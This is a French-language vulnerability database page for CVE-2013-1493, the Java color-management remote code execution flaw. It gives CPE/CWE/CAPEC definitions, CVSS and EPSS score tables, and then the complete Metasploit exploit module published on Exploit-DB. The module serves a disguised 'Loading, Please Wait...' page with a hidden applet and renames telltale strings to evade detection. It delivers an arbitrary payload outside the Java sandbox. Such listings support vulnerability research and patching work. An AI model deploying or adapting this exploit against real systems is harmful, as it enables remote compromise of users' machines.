CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
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The color management (CMM) functionality in the 2D component in Oracle Java SE 7 Update 15 and earlier, 6 Update 41 and earlier, and 5.0 Update 40 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (crash) via an image with crafted raster parameters, which triggers (1) an out-of-bounds read or (2) memory corruption in the JVM, as exploited in the wild in February 2013.
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
86.06%
–
–
2023-02-19
–
–
85.37%
–
–
2023-03-12
–
–
–
96.91%
–
2023-04-09
–
–
–
96.91%
–
2023-06-11
–
–
–
96.85%
–
2023-07-30
–
–
–
96.82%
–
2023-09-24
–
–
–
96.8%
–
2023-11-12
–
–
–
96.85%
–
2023-11-26
–
–
–
96.9%
–
2024-01-28
–
–
–
96.66%
–
2024-03-31
–
–
–
96.6%
–
2024-06-02
–
–
–
96.65%
–
2024-08-04
–
–
–
96.42%
–
2024-10-06
–
–
–
96.65%
–
2024-12-08
–
–
–
96.67%
–
2024-12-22
–
–
–
96.45%
–
2025-02-02
–
–
–
96.42%
–
2025-01-19
–
–
–
96.45%
–
2025-02-02
–
–
–
96.42%
–
2025-03-18
–
–
–
–
91.9%
2025-05-27
–
–
–
–
91.61%
2025-05-31
–
–
–
–
91.9%
2025-08-29
–
–
–
–
93.27%
2025-09-12
–
–
–
–
93.01%
2025-09-12
–
–
–
–
93.01,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2013-03-28 23h00 +00:00 Auteur : Metasploit EDB Vérifié : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java CMM Remote Code Execution',
'Description' => %q{
This module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
systems. This exploit doesn't bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
],
'References' =>
[
[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
'Platform' => [ 'win', 'java' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 1,
'DisclosureDate' => 'Mar 01 2013'
))
end
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
@init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
@leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
@buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
@color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha("Init".length)
@init_class.gsub!("Init", @init_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@init_class_name}.class", @init_class)
jar.add_file("Leak.class", @leak_class)
jar.add_file("MyBufferedImage.class", @buffered_image_class)
jar.add_file("MyColorSpace.class", @color_space_class)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
html += %Q|</applet></body></html>|
return html
end
end